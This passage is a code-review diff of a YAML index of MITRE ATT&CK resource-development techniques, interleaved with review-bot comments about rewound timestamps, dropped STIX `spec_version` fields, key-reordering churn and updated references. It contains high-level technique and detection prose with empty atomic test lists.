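Review bot: the new last paragraph of T1583.001 describes registering a domain through a victim's Route53 account, i.e. with a compromised environment's resources. That sits on the boundary with T1584 (`Compromise Infrastructure`, whose description in this same file reads "Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure"), so expect procedure examples to map either way; nothing to change in the index itself, since the text is upstream. The `(Citation: Invictus IR DangerDev 2024)` key is resolved in a later hunk and the bump to `x_mitre_version: '1.4'` follows, which is consistent. The blank lines inserted into the `|-` block scalar are fine: they become paragraph breaks rather than ending the scalar.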
@@ -53152,7 +53825,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -53191,6 +53864,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -53246,7 +53923,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -53304,7 +53980,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -53384,7 +54059,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -53444,7 +54118,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -53466,7 +54139,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -53485,42 +54158,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -53529,22 +54170,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
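Review bot: `spec_version: '2.1'` is dropped from the T1583.003 object here (and from every technique object further down in this diff) at the same time as `x_mitre_attack_spec_version` is raised to 3.2.0 and `revoked: false` is added. `spec_version` is a required common property on every STIX 2.1 object, so anything downstream that validates these `technique:` blocks as STIX will start failing on this file. If the generator now reads a bundle-level `spec_version` and deliberately omits the per-object one, say so in the commit message; otherwise keep the line alongside the new `x_mitre_attack_spec_version: 3.2.0`.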
@@ -53558,7 +54230,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -53645,11 +54317,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
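Review bot: `modified` for T1586 goes backwards, from `2023-05-09T14:00:00.188Z` to `2023-04-11T01:08:56.774Z`. The same rewind appears for T1584.005 (2022-05-11 to 2022-04-19), T1585.001 (2022-04-25 to 2021-10-16), T1587.004 (2022-04-25 to 2021-04-15), T1608.003 (2022-04-25 to 2021-10-16), T1584.002 (2022-05-11 to 2022-04-19) and T1588.003 (2022-04-25 to 2021-10-17), while the techniques with real content changes in this diff move forward to 2024 dates. A regeneration of the index should never rewind a timestamp; it suggests the generator is now pulling an older revision of these particular objects. Check which ATT&CK STIX source and version the generator reads and confirm these seven are the current revisions before merging.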
@@ -53709,7 +54380,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -53751,7 +54421,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53766,7 +54436,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -53857,11 +54526,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -53894,15 +54562,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
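Review bot: the T1608.005 description gains new text, "(including one-time, single use links)", but no `x_mitre_version` change is visible for this object, whereas the other two description edits in this diff (T1584.007 and T1608.006) come with a 1.0 to 1.1 bump. If the version line really is unchanged upstream this is fine, but it is worth a quick check that the generator did not drop a version change while reordering keys, since the same hunk also only fixes the contributor name `Goldstein Menachem` to `Menachem Goldstein`.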
@@ -53986,7 +54655,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -54040,7 +54708,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -54091,36 +54758,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -54129,21 +54770,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
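Review bot: most of this hunk pair for T1588.002 (36 lines removed, 47 added) is key reordering, not change: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted from the top of the object and reinserted at the bottom. That hides the three substantive edits: the `modified` bump to 2024-09-16, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0 with `revoked: false` and `x_mitre_deprecated: false` added, and the Recorded Future reference moving to `https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers` with a new retrieval date. Consider having the generator emit keys in a fixed order (or with sorted keys) so the next regeneration diffs down to what actually changed; T1588 and T1587 below get the same churn.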
@@ -54189,17 +54856,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -54225,7 +54891,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -54257,8 +54923,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
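Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1585.001 outright, with nothing added back elsewhere in the object, unlike T1588.002 and T1588 where 2.1.0 is replaced by 3.2.0. T1587.004, T1608.003 and T1588.003 lose the field the same way further down. Combined with the rewound `modified` dates on the same four objects, these look like older revisions that predate the field rather than current ones. If anything consuming the index reads `x_mitre_attack_spec_version`, these entries are now inconsistent with the rest of the file; regenerate them from the same source revision as the others.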
@@ -54285,7 +54949,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -54309,8 +54973,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -54336,7 +54998,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -54370,8 +55032,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -54419,7 +55079,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -54435,7 +55095,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -54494,54 +55153,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -54552,22 +55167,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
